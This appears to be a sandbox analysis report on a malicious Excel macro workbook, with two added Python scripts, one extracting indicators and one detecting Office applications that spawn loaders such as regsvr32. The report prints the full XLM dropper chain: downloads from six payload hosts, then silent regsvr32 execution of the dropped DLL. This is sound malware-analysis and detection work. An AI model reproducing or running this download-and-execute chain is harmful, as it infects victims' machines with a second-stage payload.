General

Target: paquete_3841728.xlsm
Size: 46KB
Sample: 230216-xkd3jsbb87
MD5: 848e5d22345ad8b064cf0da589a28db2
SHA1: e1dd2f21d103c0e012dcb29ea7f982803b37689c
SHA256: 34ebe038a8b30eebad90de95dc17f118029a11a0450ceb36fee4741a4c226cb3
SHA512: 2e95cfd295e94e5d1e69710c16a20b5f6c4797695f670732c0607dccd0260c9d50f57dae59f277fb62b5959b8d88453a38cf5a4708d73fea810bd6601c2ee118
SSDEEP: 768:SEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:9olvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Behavioral task: behavioral1
Sample: paquete_3841728.xlsm
Resource: win10-20220812-en
Malware Config

Extracted URLs (download locations for the second-stage module, in the order the macro tries them):
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
http://bizfedlacounty.org/wp-auth/GxsV/

Formulas (Excel 4.0 / XLM macro chain, one formula per line):
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0)
=IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0))
=IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0))
=IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0))
=IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0))
=IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0))
=IF('EFALGV'!D20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
=RETURN()

How the chain works: each CALL invokes urlmon!URLDownloadToFileA (the type string JJCCBB declares a long return value and long, string, string, double, double arguments) to fetch the payload into the relative path ..\enu.ocx, resolved against the current working directory of the Excel process. The first download is unconditional; each later one runs only when a guard cell on sheet EFALGV (D10, D12, ... D20) is negative. That is consistent with each guard cell holding the return value of the preceding CALL: URLDownloadToFileA returns 0 on success and a failing HRESULT on error, which reads as a negative signed long, so the six URLs form a fallback list rather than six separate downloads. If the last attempt also fails the workbook closes itself with CLOSE(0); otherwise EXEC launches the 32-bit loader C:\Windows\SysWow64\regsvr32.exe with /s, which silently loads the dropped file as a COM DLL (the .ocx extension is cosmetic; the SysWow64 path implies a 32-bit module).
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
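Added example (not part of the sandbox report): a Python script that walks the formula chain above and pulls out the download URLs in fallback order, the drop path, the guard cells and the EXEC command line. The formula text is embedded as constructed input copied from this page; the function and field names are my own, and the reading of the guard cells as HRESULT results is an assumption noted in the comments.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed input: the XLM formula chain from the report, one formula per line.
XLM_FORMULAS = r"""
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0)
=IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0))
=IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0))
=IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0))
=IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0))
=IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0))
=IF('EFALGV'!D20<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx")
=RETURN()
"""

# CALL("urlmon","URLDownloadToFileA","<types>",0,"<url>","<path>",0,0)
# The type string (JJCCBB here) declares a long return value and the argument types
# long, string, string, double, double, i.e. URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB).
CALL_RE = re.compile(
    r'CALL\("urlmon","URLDownloadToFileA","[A-Z]+",0,"(?P<url>[^"]+)","(?P<path>[^"]+)",0,0\)'
)
IF_RE = re.compile(r"^=IF\((?P<cond>[^,]+),")
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')


def parse_xlm_dropper(formulas: str) -> dict:
    """Walk the formula chain and collect URLs (in fallback order), drop paths,
    EXEC commands and the cell condition gating each download."""
    urls, paths, execs, guards = [], [], [], []
    closes = False
    for line in formulas.splitlines():
        line = line.strip()
        if not line:
            continue
        m = CALL_RE.search(line)
        if m:
            urls.append(m["url"])
            paths.append(m["path"])
            g = IF_RE.match(line)
            # Assumption: the guard cell holds the previous CALL's return value, so
            # "<0" means the previous URLDownloadToFileA returned a failing HRESULT.
            guards.append(g["cond"] if g else None)
            continue
        m = EXEC_RE.search(line)
        if m:
            execs.append(m["cmd"])
            continue
        if "CLOSE(" in line:
            closes = True  # workbook closes itself when every download fails
    return {
        "urls": urls,
        "hosts": sorted({urlsplit(u).netloc for u in urls}),
        "drop_paths": sorted(set(paths)),
        "guards": guards,
        "closes_on_failure": closes,
        "exec": execs,
    }


def describe_exec(cmd: str) -> dict:
    """Split an EXEC command line into the binary, its switches and the module it loads."""
    parts = cmd.split()
    switches = [p for p in parts[1:] if p.startswith("/")]
    modules = [p for p in parts[1:] if not p.startswith("/")]
    return {
        "binary": parts[0],
        "silent": "/s" in {s.lower() for s in switches},  # /s suppresses regsvr32's result dialog
        "module": modules[-1] if modules else None,
        # SysWow64\regsvr32.exe is the 32-bit loader on 64-bit Windows, so the
        # payload is expected to be a 32-bit DLL regardless of the .ocx extension.
        "wow64": "syswow64" in parts[0].lower(),
    }


if __name__ == "__main__":
    result = parse_xlm_dropper(XLM_FORMULAS)
    result["exec_details"] = [describe_exec(c) for c in result["exec"]]
    print(json.dumps(result, indent=2))
```

The output is what you would feed into blocklists (hosts and full URLs) and into an endpoint hunt (the ..\enu.ocx drop path and the regsvr32 command line).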
Targets

Target: paquete_3841728.xlsm (46KB; hashes as listed under General)
Score: 10/10

Signature: Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro. Here it is consistent with the EXEC formula above: the Excel process launches C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx, a child no spreadsheet should need.
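Added example (not from the report or the sandbox vendor): detection logic for the parent/child relationship behind this signature, run over a handful of constructed process-creation events. The Office install paths, the benign events and the rule names are my own for illustration; only the regsvr32 command line comes from the page.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 or an EDR would give you)."""
    parent_image: str
    image: str
    command_line: str


# Office hosts that should never need to spawn loaders, script hosts or shells.
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Children worth an alert when the parent is an Office application.
SUSPICIOUS_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                       "cscript.exe", "cmd.exe", "powershell.exe", "certutil.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per Office-to-LOLBin process creation, escalating the
    regsvr32 pattern used by the XLM dropper on this page (/s plus a relative .ocx)."""
    alerts = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent not in OFFICE_HOSTS or child not in SUSPICIOUS_CHILDREN:
            continue
        tokens = ev.command_line.lower().split()
        reasons = ["office_spawned_lolbin"]
        if child == "regsvr32.exe":
            if "/s" in tokens:
                reasons.append("regsvr32_silent")  # /s hides the success/failure dialog
            if any(t.endswith(".ocx") or t.startswith("..\\") for t in tokens[1:]):
                reasons.append("regsvr32_relative_or_ocx_module")  # e.g. ..\enu.ocx
        alerts.append({
            "parent": parent,
            "child": child,
            "command_line": ev.command_line,
            "reasons": reasons,
            "severity": "high" if len(reasons) > 1 else "medium",
        })
    return alerts


# Constructed sample telemetry: the chain from the report plus benign noise.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r'"EXCEL.EXE" paquete_3841728.xlsm'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\SysWow64\regsvr32.exe",
                 r"C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx"),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'),  # installer, not Office
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c whoami"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"], alert["parent"], "->", alert["child"], alert["reasons"])
```

The parent check is what keeps the rule quiet: regsvr32 with /s is routine for installers, so the same command line under msiexec.exe produces nothing, while the identical line under EXCEL.EXE is escalated to high.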